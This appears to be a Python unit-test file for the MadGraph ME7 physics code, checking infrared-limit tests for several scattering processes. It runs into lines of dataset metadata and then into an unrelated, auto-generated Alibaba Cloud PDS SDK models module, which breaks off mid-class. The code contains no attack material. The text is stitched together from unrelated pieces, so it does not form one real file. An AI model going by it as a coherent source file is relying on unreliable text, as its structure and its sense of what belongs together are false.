        with ME7_interface.ME7RunEnvironment(silence=True, loggers=logging.CRITICAL):
            timing = [
                1.e3*(res/float(n_calls))
                for i, res in enumerate(timeit.repeat(call, number=n_calls, repeat=2)) ]
        # NOTE(review): `res` is built but never used in the assertion message below
        res = '\n'+'\n'.join('%d : %g ms'%(i+1, res) for i,res in enumerate(timing))
        self.assertTrue(
            (timing[0] < 500.0),
            'Virtual integrand call too slow: %g ms'%(timing[0]) )
#===============================================================================
# TestME7 cataniseymour output for e+ e- > j j j @NLO
#===============================================================================
class TestME7_NLO_cataniseymour_epem_jjj(unittest.TestCase):
    """This test validates the command 'test_IR_limits' of ME7 in the cataniseymour scheme
    for the process e+ e- > j j j --NLO=QCD"""

    # If the debug mode is set to True, then the process output is not refreshed
    # but reused instead.
    debugging = False
    # Class-level flag: the expensive process output is generated only once and
    # shared by all tests of this class.
    is_process_generated = False

    def setUp(self):
        """Generate (or reuse) the process output and attach an ME7 interface to it."""
        self.tmp_process_dir = pjoin(_file_path, 'TMP_TestME7_cataniseymour_epem_jjj_output')
        # Generate the process output if it does not exist yet or if we
        # are not in debug mode.
        if os.path.isdir(self.tmp_process_dir):
            if not self.is_process_generated and not self.debugging:
                shutil.rmtree(self.tmp_process_dir)
            else:
                TestME7_NLO_cataniseymour_epem_jjj.is_process_generated = True
        if not self.is_process_generated:
            self.cmd = Cmd.MasterCmd()
            if os.path.isdir(self.tmp_process_dir):
                shutil.rmtree(self.tmp_process_dir)
            # Now generate and output a process, so as to run ME7 commands on it.
            self.do('import model loop_sm')
            self.do('set subtraction_scheme cataniseymour')
            self.do('generate e+ e- > j j j --NLO=QCD --ignore_contributions=V')
            self.do('output %s --ignore_integrated_counterterms=R' % self.tmp_process_dir)
            TestME7_NLO_cataniseymour_epem_jjj.is_process_generated = True
            if self.debugging:
                misc.sprint(debugging_warning)
                misc.sprint(
                    debugging_written % (self.__class__.__name__, self.tmp_process_dir))
        else:
            if self.debugging:
                misc.sprint(debugging_warning)
                misc.sprint(
                    debugging_reused % (self.__class__.__name__, self.tmp_process_dir))
        # Now initialize an ME7 interface on the above process output.
        self.cmd = ME7_interface.MadEvent7Cmd(me_dir=self.tmp_process_dir)
        self.cmd.no_notification()

    def __del__(self):
        # Best-effort cleanup of the temporary process output (kept in debug mode).
        if os.path.isdir(self.tmp_process_dir) and not self.debugging:
            shutil.rmtree(self.tmp_process_dir)

    def do(self, line):
        """Exec a line in the cmd under test."""
        self.cmd.exec_cmd(line)

    def verify_ME7_test_results(self, results_file):
        """Parse and verify that all tests output in 'results_file' are passed."""
        full_path = pjoin(self.tmp_process_dir, results_file)
        # Use a context manager so the handle is always released, and skip blank
        # lines (e.g. a trailing newline) that would break the unpacking below.
        with open(full_path, 'r') as results:
            for line in results:
                if not line.strip():
                    continue
                process, limit, outcome, ratio = line.split('|')[:4]
                self.assertEqual(outcome.strip(), 'PASSED', line)

    def _check_ir_limits(self, **overrides):
        """Run 'test_IR_limits' with the class defaults updated by 'overrides',
        then verify that every recorded result is PASSED."""
        options = {
            'correction_order': 'NLO',
            'counterterms': 'all',
            'process': 'e+ e- > g g d d~',
            'show_plots': False,
            'save_plots': False,
            'seed': 666,
            'n_steps': 10,
            'min_scaling_variable': 1.0e-7,
            'acceptance_threshold': 5.0e-4,
            'save_results_to_path': 'test_IR_limit_output_for_acceptance_test.dat',
        }
        options.update(overrides)
        self.do(get_test_IR_limit_cmd(options))
        self.verify_ME7_test_results(options['save_results_to_path'])

    def test_ME7_cataniseymour_ggqqx_collinear_limits(self):
        """Pure-collinear limits of e+ e- > g g d d~."""
        self._check_ir_limits(limits='purecollinear')

    def test_ME7_cataniseymour_ggqqx_soft_limits(self):
        """Single-soft limits of e+ e- > g g d d~."""
        self._check_ir_limits(limits="['S(3)','S(4)']")

    def test_ME7_cataniseymour_ggqqx_softcollinear_limits(self):
        """Soft-collinear limits of e+ e- > g g d d~ (tighter scaling and threshold)."""
        self._check_ir_limits(
            limits="['C(S(3),4)','C(S(3),5)','C(S(3),6)','C(S(4),3)','C(S(4),5)','C(S(4),6)']",
            min_scaling_variable=1.0e-9,
            acceptance_threshold=1.0e-4)

    def test_ME7_cataniseymour_qqxqqx_collinear_limits(self):
        """Collinear limits of e+ e- > d d~ d d~."""
        self._check_ir_limits(limits='collinear', process='e+ e- > d d~ d d~')
#===============================================================================
# TestME7 colorful output for p p > j j @NLO
#===============================================================================
class TestME7_NLO_colorful_pp_jj(unittest.TestCase):
    """This test validates the command 'test_IR_limits' of ME7 in the colorful scheme
    as well as integrand calls for the process p p > j j --NLO=QCD"""

    # If the debug mode is set to True, then the process output is not refreshed
    # but reused instead.
    debugging = False
    # Class-level flag: the expensive process output is generated only once and
    # shared by all tests of this class.
    is_process_generated = False

    def setUp(self):
        """Basic building of the class to test: generate or reuse the process output."""
        self.tmp_process_dir = pjoin(_file_path, 'TMP_TestME7_colorful_pp_jj_output')
        # Generate the process output if it does not exist yet or if we
        # are not in debug mode.
        if os.path.isdir(self.tmp_process_dir):
            if not self.is_process_generated and not self.debugging:
                shutil.rmtree(self.tmp_process_dir)
            else:
                TestME7_NLO_colorful_pp_jj.is_process_generated = True
        if not self.is_process_generated:
            self.cmd = Cmd.MasterCmd()
            if os.path.isdir(self.tmp_process_dir):
                shutil.rmtree(self.tmp_process_dir)
            # Now generate and output a process, so as to run ME7 commands on it.
            self.do('import model loop_sm')
            self.do('set subtraction_scheme colorful')
            self.do('generate p p > j j --NLO=QCD --ignore_contributions=V')
            self.do('output %s --ignore_integrated_counterterms=R' % self.tmp_process_dir)
            TestME7_NLO_colorful_pp_jj.is_process_generated = True
            if self.debugging:
                misc.sprint(debugging_warning)
                misc.sprint(
                    debugging_written % (self.__class__.__name__, self.tmp_process_dir))
        else:
            if self.debugging:
                misc.sprint(debugging_warning)
                misc.sprint(
                    debugging_reused % (self.__class__.__name__, self.tmp_process_dir))
        # Now initialize an ME7 interface on the above process output.
        self.cmd = ME7_interface.MadEvent7Cmd(me_dir=self.tmp_process_dir)
        self.cmd.no_notification()

    def __del__(self):
        # Best-effort cleanup of the temporary process output (kept in debug mode).
        if os.path.isdir(self.tmp_process_dir) and not self.debugging:
            shutil.rmtree(self.tmp_process_dir)

    def do(self, line):
        """Exec a line in the cmd under test."""
        self.cmd.exec_cmd(line)

    def verify_ME7_test_results(self, results_file):
        """Parse and verify that all tests output in 'results_file' are passed."""
        full_path = pjoin(self.tmp_process_dir, results_file)
        # Use a context manager so the handle is always released, and skip blank
        # lines (e.g. a trailing newline) that would break the unpacking below.
        with open(full_path, 'r') as results:
            for line in results:
                if not line.strip():
                    continue
                process, limit, outcome, ratio = line.split('|')[:4]
                self.assertEqual(outcome.strip(), 'PASSED', line)

    def test_ME7_colorful_gq_ggq_collinear_limits(self):
        """Check the test of collinear limits on a particular process."""
        options = {
            'correction_order': 'NLO',
            'counterterms': 'def',
            'process': 'g u > g g u',
            'show_plots': False,
            'save_plots': False,
            'seed': 666,
            'n_steps': 10,
            'min_scaling_variable': 1.0e-8,
            'acceptance_threshold': 5.0e-3,
            'save_results_to_path': 'test_IR_limit_output_for_acceptance_test.dat',
        }
        # Probe each collinear configuration in turn with the same settings.
        for limit in ('C(1,4)', 'C(2,4)', 'C(1,5)', 'C(2,5)'):
            options['limits'] = limit
            self.do(get_test_IR_limit_cmd(options))
            self.verify_ME7_test_results(options['save_results_to_path'])
#===============================================================================
# TestME7 colorful output for e+ e- > g u u~ @NNLO
#===============================================================================
class TestME7_NNLO_colorful_epem_guux(unittest.TestCase):
    """This test validates the command 'test_IR_limits' of ME7 in the colorful scheme
    as well as integrand calls for the process e+ e- > g u u~ --NNLO=QCD"""

    # If the debug mode is set to True, then the process output is not refreshed
    # but reused instead.
    debugging = False
    # Class-level flag: the expensive process output is generated only once and
    # shared by all tests of this class.
    is_process_generated = False

    def setUp(self):
        """Basic building of the class to test: generate or reuse the process output."""
        self.tmp_process_dir = pjoin(_file_path, 'TMP_TestME7_colorful_epem_guux_NNLO_output')
        # Generate the process output if it does not exist yet or if we
        # are not in debug mode.
        if os.path.isdir(self.tmp_process_dir):
            if not self.is_process_generated and not self.debugging:
                shutil.rmtree(self.tmp_process_dir)
            else:
                TestME7_NNLO_colorful_epem_guux.is_process_generated = True
        if not self.is_process_generated:
            self.cmd = Cmd.MasterCmd()
            if os.path.isdir(self.tmp_process_dir):
                shutil.rmtree(self.tmp_process_dir)
            # Now generate and output a process, so as to run ME7 commands on it.
            self.do('import model loop_sm')
            self.do('set subtraction_scheme colorful')
            self.do('generate e+ e- > g u u~ --NNLO=QCD --ignore_contributions=V,VV')
            self.do('output %s --ignore_integrated_counterterms=all' % self.tmp_process_dir)
            TestME7_NNLO_colorful_epem_guux.is_process_generated = True
            if self.debugging:
                misc.sprint(debugging_warning)
                misc.sprint(
                    debugging_written % (self.__class__.__name__, self.tmp_process_dir))
        else:
            if self.debugging:
                misc.sprint(debugging_warning)
                misc.sprint(
                    debugging_reused % (self.__class__.__name__, self.tmp_process_dir))
        # Now initialize an ME7 interface on the above process output.
        self.cmd = ME7_interface.MadEvent7Cmd(me_dir=self.tmp_process_dir)
        self.cmd.no_notification()

    def __del__(self):
        # Best-effort cleanup of the temporary process output (kept in debug mode).
        if os.path.isdir(self.tmp_process_dir) and not self.debugging:
            shutil.rmtree(self.tmp_process_dir)

    def do(self, line):
        """Exec a line in the cmd under test."""
        self.cmd.exec_cmd(line)

    def verify_ME7_test_results(self, results_file):
        """Parse and verify that all tests output in 'results_file' are passed."""
        full_path = pjoin(self.tmp_process_dir, results_file)
        # Use a context manager so the handle is always released, and skip blank
        # lines (e.g. a trailing newline) that would break the unpacking below.
        with open(full_path, 'r') as results:
            for line in results:
                if not line.strip():
                    continue
                process, limit, outcome, ratio = line.split('|')[:4]
                self.assertEqual(outcome.strip(), 'PASSED', line)

    def _check_ir_limits(self, **overrides):
        """Run 'test_IR_limits' with the class defaults updated by 'overrides',
        then verify that every recorded result is PASSED."""
        options = {
            'correction_order': 'NNLO',
            'counterterms': 'def',
            'show_plots': False,
            'save_plots': False,
            'seed': 666,
            'n_steps': 10,
            'min_scaling_variable': 1.0e-16,
            'acceptance_threshold': 5.0e-4,
            'save_results_to_path': 'test_IR_limit_output_for_acceptance_test.dat',
        }
        options.update(overrides)
        self.do(get_test_IR_limit_cmd(options))
        self.verify_ME7_test_results(options['save_results_to_path'])

    def test_ME7_g_gqqx_triple_collinear(self):
        """Triple-collinear limit C(3,4,5) in e+ e- > g u u~ u~ u."""
        self._check_ir_limits(limits='C(3,4,5)', counterterms='C(3,4,5)',
                              process='e+ e- > g u u~ u~ u')

    def test_ME7_q_qqqx_triple_collinear(self):
        """Triple-collinear limit C(4,5,7) in e+ e- > g u u~ u~ u."""
        self._check_ir_limits(limits='C(4,5,7)', counterterms='C(4,5,7)',
                              process='e+ e- > g u u~ u~ u')

    def test_ME7_q_qQQx_triple_collinear(self):
        """Triple-collinear limit C(4,6,7) in e+ e- > g u u~ s~ s."""
        self._check_ir_limits(limits='C(4,6,7)', counterterms='C(4,6,7)',
                              process='e+ e- > g u u~ s~ s')

    def test_ME7_q_qgg_triple_collinear(self):
        """Triple-collinear limit C(3,4,6) in e+ e- > g u u~ g g."""
        self._check_ir_limits(limits='C(3,4,6)', counterterms='C(3,4,6)',
                              process='e+ e- > g u u~ g g')

    def test_ME7_g_ggg_triple_collinear(self):
        """Triple-collinear limit C(3,6,7) in e+ e- > g u u~ g g."""
        self._check_ir_limits(limits='C(3,6,7)', counterterms='C(3,6,7)',
                              process='e+ e- > g u u~ g g')

    def test_ME7_all_triple_collinears(self):
        """All triple-collinear limits matched by a regex, default counterterms."""
        self._check_ir_limits(limits="r'\(C\(\d,\d,\d\),\)'",
                              acceptance_threshold=8.0e-4)
| 43.728788
| 94
| 0.547902
| 3,361
| 28,861
| 4.408807
| 0.088962
| 0.022675
| 0.04535
| 0.055068
| 0.879066
| 0.866649
| 0.858011
| 0.850452
| 0.847348
| 0.833986
| 0
| 0.019438
| 0.326219
| 28,861
| 659
| 95
| 43.795144
| 0.742569
| 0.132185
| 0
| 0.735849
| 0
| 0.002096
| 0.187738
| 0.043881
| 0.006289
| 0
| 0
| 0
| 0.014675
| 1
| 0.079665
| false
| 0.008386
| 0.041929
| 0
| 0.148847
| 0.033543
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
763d100b0c721c908e88a1328b813060f00aeed2
| 723,620
|
py
|
Python
|
hosting/python/alibabacloud_pds_hosting_sdk/models.py
|
tianxuan-cl/alibabacloud-pds-sdk
|
a0fabd67f7b3baf03192a50858ff97e4247c92ef
|
[
"Apache-2.0"
] | 4
|
2020-08-21T08:40:27.000Z
|
2021-04-04T03:39:06.000Z
|
hosting/python/alibabacloud_pds_hosting_sdk/models.py
|
tianxuan-cl/alibabacloud-pds-sdk
|
a0fabd67f7b3baf03192a50858ff97e4247c92ef
|
[
"Apache-2.0"
] | 35
|
2020-08-31T08:10:53.000Z
|
2022-03-24T09:43:11.000Z
|
hosting/python/alibabacloud_pds_hosting_sdk/models.py
|
tianxuan-cl/alibabacloud-pds-sdk
|
a0fabd67f7b3baf03192a50858ff97e4247c92ef
|
[
"Apache-2.0"
] | 16
|
2020-08-24T05:42:43.000Z
|
2022-03-16T03:03:53.000Z
|
# -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from Tea.model import TeaModel
from typing import List, Dict
class RuntimeOptions(TeaModel):
    """Per-request runtime options: retry, timeout and proxy settings."""

    # (attribute name, wire key) pairs driving to_map/from_map.
    _KEY_MAP = (
        ('autoretry', 'autoretry'),
        ('ignore_ssl', 'ignoreSSL'),
        ('max_attempts', 'maxAttempts'),
        ('backoff_policy', 'backoffPolicy'),
        ('backoff_period', 'backoffPeriod'),
        ('read_timeout', 'readTimeout'),
        ('connect_timeout', 'connectTimeout'),
        ('http_proxy', 'httpProxy'),
        ('https_proxy', 'httpsProxy'),
        ('no_proxy', 'noProxy'),
        ('max_idle_conns', 'maxIdleConns'),
        ('local_addr', 'localAddr'),
        ('socks_5proxy', 'socks5Proxy'),
        ('socks_5net_work', 'socks5NetWork'),
    )

    def __init__(
        self,
        autoretry: bool = None,
        ignore_ssl: bool = None,
        max_attempts: int = None,
        backoff_policy: str = None,
        backoff_period: int = None,
        read_timeout: int = None,
        connect_timeout: int = None,
        http_proxy: str = None,
        https_proxy: str = None,
        no_proxy: str = None,
        max_idle_conns: int = None,
        local_addr: str = None,
        socks_5proxy: str = None,
        socks_5net_work: str = None,
    ):
        # whether to retry failed requests
        self.autoretry = autoretry
        # skip SSL certificate validation
        self.ignore_ssl = ignore_ssl
        # maximum number of retries
        self.max_attempts = max_attempts
        # backoff policy
        self.backoff_policy = backoff_policy
        # backoff period
        self.backoff_period = backoff_period
        # read timeout
        self.read_timeout = read_timeout
        # connect timeout
        self.connect_timeout = connect_timeout
        # http proxy url
        self.http_proxy = http_proxy
        # https proxy url
        self.https_proxy = https_proxy
        # proxy blacklist
        self.no_proxy = no_proxy
        # maximum number of idle connections
        self.max_idle_conns = max_idle_conns
        # local address to bind to
        self.local_addr = local_addr
        # SOCKS5 proxy
        self.socks_5proxy = socks_5proxy
        # SOCKS5 network type
        self.socks_5net_work = socks_5net_work

    def validate(self):
        pass

    def to_map(self):
        # Emit only fields that were explicitly set.
        result = {}
        for attr, key in self._KEY_MAP:
            value = getattr(self, attr)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or {}
        for attr, key in self._KEY_MAP:
            value = m.get(key)
            if value is not None:
                setattr(self, attr, value)
        return self
class Config(TeaModel):
    """Client configuration: endpoint, credentials and identity settings."""

    # (attribute name, wire key) pairs driving to_map/from_map.
    _KEY_MAP = (
        ('endpoint', 'endpoint'),
        ('domain_id', 'domainId'),
        ('client_id', 'clientId'),
        ('refresh_token', 'refreshToken'),
        ('client_secret', 'clientSecret'),
        ('access_token', 'accessToken'),
        ('expire_time', 'expireTime'),
        ('protocol', 'protocol'),
        ('type', 'type'),
        ('security_token', 'securityToken'),
        ('access_key_id', 'accessKeyId'),
        ('access_key_secret', 'accessKeySecret'),
        ('nickname', 'nickname'),
        ('user_agent', 'userAgent'),
    )

    def __init__(
        self,
        endpoint: str = None,
        domain_id: str = None,
        client_id: str = None,
        refresh_token: str = None,
        client_secret: str = None,
        access_token: str = None,
        expire_time: str = None,
        protocol: str = None,
        type: str = None,
        security_token: str = None,
        access_key_id: str = None,
        access_key_secret: str = None,
        nickname: str = None,
        user_agent: str = None,
    ):
        self.endpoint = endpoint
        self.domain_id = domain_id
        self.client_id = client_id
        self.refresh_token = refresh_token
        self.client_secret = client_secret
        self.access_token = access_token
        self.expire_time = expire_time
        self.protocol = protocol
        self.type = type
        self.security_token = security_token
        self.access_key_id = access_key_id
        self.access_key_secret = access_key_secret
        self.nickname = nickname
        self.user_agent = user_agent

    def validate(self):
        # Only domain_id carries a format constraint.
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '^[a-zA-Z0-9_-]+$')

    def to_map(self):
        # Emit only fields that were explicitly set.
        result = {}
        for attr, key in self._KEY_MAP:
            value = getattr(self, attr)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or {}
        for attr, key in self._KEY_MAP:
            value = m.get(key)
            if value is not None:
                setattr(self, attr, value)
        return self
class LinkInfo(TeaModel):
    """A single login binding (method, identity and extra data) of a user."""

    # Wire keys are identical to the attribute names for this model.
    _FIELDS = ('extra', 'identity', 'type')

    def __init__(
        self,
        extra: str = None,
        identity: str = None,
        type: str = None,
    ):
        # Extra data; e.g. when type is 'mobile' this holds the country code (default 86).
        self.extra = extra
        # Existing login identity of the current user.
        self.identity = identity
        # Existing login method of the current user.
        self.type = type

    def validate(self):
        pass

    def to_map(self):
        # Emit only fields that were explicitly set.
        return {name: getattr(self, name) for name in self._FIELDS
                if getattr(self, name) is not None}

    def from_map(self, m: dict = None):
        m = m or {}
        for name in self._FIELDS:
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class AccountAccessTokenResponse(TeaModel):
    """Login result: the account access token plus user/device metadata."""

    # Field names; wire keys are identical to the attribute names.
    _FIELDS = (
        'access_token', 'avatar', 'default_drive_id', 'default_sbox_drive_id',
        'device_id', 'device_name', 'exist_link', 'expire_time', 'expires_in',
        'is_first_login', 'need_link', 'need_rp_verify', 'nick_name',
        'pin_setup', 'refresh_token', 'role', 'state', 'token_type',
        'user_data', 'user_id', 'user_name',
    )

    def __init__(
        self,
        access_token: str = None,
        avatar: str = None,
        default_drive_id: str = None,
        default_sbox_drive_id: str = None,
        device_id: str = None,
        device_name: str = None,
        exist_link: List[LinkInfo] = None,
        expire_time: str = None,
        expires_in: int = None,
        is_first_login: bool = None,
        need_link: bool = None,
        need_rp_verify: bool = None,
        nick_name: str = None,
        pin_setup: bool = None,
        refresh_token: str = None,
        role: str = None,
        state: str = None,
        token_type: str = None,
        user_data: dict = None,
        user_id: str = None,
        user_name: str = None,
    ):
        # Access token used to call business APIs.
        self.access_token = access_token
        # Avatar of the current user.
        self.avatar = avatar
        # Default drive ID.
        self.default_drive_id = default_drive_id
        # Default sbox drive ID.
        self.default_sbox_drive_id = default_sbox_drive_id
        # Device ID bound through the device flow.
        self.device_id = device_id
        # Device name bound through the device flow.
        self.device_name = device_name
        # Existing login bindings of the current user.
        self.exist_link = exist_link
        # Access token expiry, ISO timestamp.
        self.expire_time = expire_time
        # Access token expiry, in seconds.
        self.expires_in = expires_in
        # Whether this is the user's first login.
        self.is_first_login = is_first_login
        # Whether the account still needs to be linked.
        self.need_link = need_link
        # Whether real-person verification is required.
        self.need_rp_verify = need_rp_verify
        # Nickname of the current user.
        self.nick_name = nick_name
        # Whether the user's data password has been set.
        self.pin_setup = pin_setup
        # Token used to refresh the access token.
        self.refresh_token = refresh_token
        # Role of the current user.
        self.role = role
        # Temporary grant used to set a password after a successful login.
        self.state = state
        # Access token type, e.g. Bearer.
        self.token_type = token_type
        # User-defined JSON data (config items, small temporary data; up to 1K).
        self.user_data = user_data
        # ID of the current user.
        self.user_id = user_id
        # Name of the current user.
        self.user_name = user_name

    def validate(self):
        self.validate_required(self.access_token, 'access_token')
        # Delegate deep validation to each present link entry.
        if self.exist_link:
            for link in self.exist_link:
                if link:
                    link.validate()
        self.validate_required(self.need_link, 'need_link')

    def to_map(self):
        result = {}
        for name in self._FIELDS:
            value = getattr(self, name)
            if name == 'exist_link':
                # This key is always emitted, even when the list is unset.
                result[name] = []
                if value is not None:
                    result[name] = [k.to_map() if k else None for k in value]
                continue
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        m = m or {}
        for name in self._FIELDS:
            if name == 'exist_link':
                # The list is always reset, then refilled from the map if present.
                self.exist_link = []
                if m.get(name) is not None:
                    for item in m.get(name):
                        self.exist_link.append(LinkInfo().from_map(item))
                continue
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class CancelLinkModel(TeaModel):
    """Response wrapper for the cancel-link operation: HTTP headers plus body."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: AccountAccessTokenResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The body is mandatory; delegate deep validation to it when present.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        result = {}
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or {}
        headers = m.get('headers')
        if headers is not None:
            self.headers = headers
        if m.get('body') is not None:
            self.body = AccountAccessTokenResponse().from_map(m['body'])
        return self
class ConfirmLinkModel(TeaModel):
    """Response wrapper for the confirm-link operation: HTTP headers plus body."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: AccountAccessTokenResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The body is mandatory; delegate deep validation to it when present.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        result = {}
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or {}
        headers = m.get('headers')
        if headers is not None:
            self.headers = headers
        if m.get('body') is not None:
            self.body = AccountAccessTokenResponse().from_map(m['body'])
        return self
class ChangePasswordModel(TeaModel):
    """Response wrapper for the change-password operation: HTTP headers plus body."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: AccountAccessTokenResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The body is mandatory; delegate deep validation to it when present.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        result = {}
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or {}
        headers = m.get('headers')
        if headers is not None:
            self.headers = headers
        if m.get('body') is not None:
            self.body = AccountAccessTokenResponse().from_map(m['body'])
        return self
class SetPasswordModel(TeaModel):
    """Response wrapper for the set-password operation (HTTP headers only)."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
    ):
        self.headers = headers

    def validate(self):
        pass

    def to_map(self):
        return {} if self.headers is None else {'headers': self.headers}

    def from_map(self, m: dict = None):
        m = m or {}
        headers = m.get('headers')
        if headers is not None:
            self.headers = headers
        return self
class VerifyCodeResponse(TeaModel):
    """Result of a verification-code check."""

    def __init__(
        self,
        state: str = None,
    ):
        # Temporary authorization code used to change the password.
        self.state = state

    def validate(self):
        self.validate_required(self.state, 'state')

    def to_map(self):
        return {} if self.state is None else {'state': self.state}

    def from_map(self, m: dict = None):
        m = m or {}
        state = m.get('state')
        if state is not None:
            self.state = state
        return self
class VerifyCodeModel(TeaModel):
    """Response wrapper for the verify-code operation: HTTP headers plus body."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: VerifyCodeResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The body is mandatory; delegate deep validation to it when present.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        result = {}
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or {}
        headers = m.get('headers')
        if headers is not None:
            self.headers = headers
        if m.get('body') is not None:
            self.body = VerifyCodeResponse().from_map(m['body'])
        return self
class GetAccessTokenByLinkInfoModel(TeaModel):
    """Response wrapper for get-access-token-by-link-info: HTTP headers plus body."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: AccountAccessTokenResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The body is mandatory; delegate deep validation to it when present.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        result = {}
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or {}
        headers = m.get('headers')
        if headers is not None:
            self.headers = headers
        if m.get('body') is not None:
            self.body = AccountAccessTokenResponse().from_map(m['body'])
        return self
class Captcha(TeaModel):
    """An image captcha challenge returned by the server."""

    # Wire keys are identical to the attribute names; all are required.
    _FIELDS = ('captcha', 'captcha_format', 'captcha_id')

    def __init__(
        self,
        captcha: str = None,
        captcha_format: str = None,
        captcha_id: str = None,
    ):
        # Image captcha content, base64 encoded.
        self.captcha = captcha
        # Image format of the captcha.
        self.captcha_format = captcha_format
        # Identifier of this captcha challenge.
        self.captcha_id = captcha_id

    def validate(self):
        # All three fields are mandatory.
        for name in self._FIELDS:
            self.validate_required(getattr(self, name), name)

    def to_map(self):
        # Emit only fields that were explicitly set.
        return {name: getattr(self, name) for name in self._FIELDS
                if getattr(self, name) is not None}

    def from_map(self, m: dict = None):
        m = m or {}
        for name in self._FIELDS:
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class GetCaptchaModel(TeaModel):
    """Response wrapper for the get-captcha operation: HTTP headers plus body."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: Captcha = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The body is mandatory; delegate deep validation to it when present.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        result = {}
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or {}
        headers = m.get('headers')
        if headers is not None:
            self.headers = headers
        if m.get('body') is not None:
            self.body = Captcha().from_map(m['body'])
        return self
class LinkInfoResponse(TeaModel):
    """Details of one authentication binding (link) of a user account."""
    def __init__(
        self,
        authentication_type: str = None,
        created_at: int = None,
        domain_id: str = None,
        extra: str = None,
        identity: str = None,
        last_login_time: int = None,
        status: str = None,
        user_id: str = None,
    ):
        # Authentication type of this link.
        self.authentication_type = authentication_type
        # Creation timestamp.
        self.created_at = created_at
        # Domain ID.
        self.domain_id = domain_id
        # Extra info; e.g. for type "mobile" this holds the country code (defaults to 86).
        self.extra = extra
        # Unique identity of the link.
        self.identity = identity
        # Timestamp of the last login.
        self.last_login_time = last_login_time
        # Status of the link.
        self.status = status
        # ID of the user this link belongs to.
        self.user_id = user_id

    def validate(self):
        # 'extra' is the only optional field.
        for name in ('authentication_type', 'created_at', 'domain_id',
                     'identity', 'last_login_time', 'status', 'user_id'):
            self.validate_required(getattr(self, name), name)

    def to_map(self):
        mapped = {}
        for name in ('authentication_type', 'created_at', 'domain_id', 'extra',
                     'identity', 'last_login_time', 'status', 'user_id'):
            value = getattr(self, name)
            if value is not None:
                mapped[name] = value
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        for name in ('authentication_type', 'created_at', 'domain_id', 'extra',
                     'identity', 'last_login_time', 'status', 'user_id'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class GetLinkInfoModel(TeaModel):
    """Response wrapper for get-link-info: HTTP headers plus a LinkInfoResponse payload."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: LinkInfoResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The payload is mandatory; deep validation is delegated to it.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapped = {}
        if self.headers is not None:
            mapped['headers'] = self.headers
        if self.body is not None:
            mapped['body'] = self.body.to_map()
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            self.body = LinkInfoResponse().from_map(m['body'])
        return self
class LinkInfoListResponse(TeaModel):
    """List container for LinkInfoResponse entries."""
    def __init__(
        self,
        items: List[LinkInfoResponse] = None,
    ):
        # The link-info entries.
        self.items = items

    def validate(self):
        self.validate_required(self.items, 'items')
        for entry in self.items or []:
            if entry:
                entry.validate()

    def to_map(self):
        # 'items' is always present in the serialized form, even when unset.
        mapped = {'items': []}
        if self.items is not None:
            mapped['items'] = [entry.to_map() if entry else None
                               for entry in self.items]
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        self.items = []
        if m.get('items') is not None:
            for entry in m.get('items'):
                self.items.append(LinkInfoResponse().from_map(entry))
        return self
class GetLinkInfoByUserIdModel(TeaModel):
    """Response wrapper for get-link-info-by-user-id: HTTP headers plus a LinkInfoListResponse payload."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
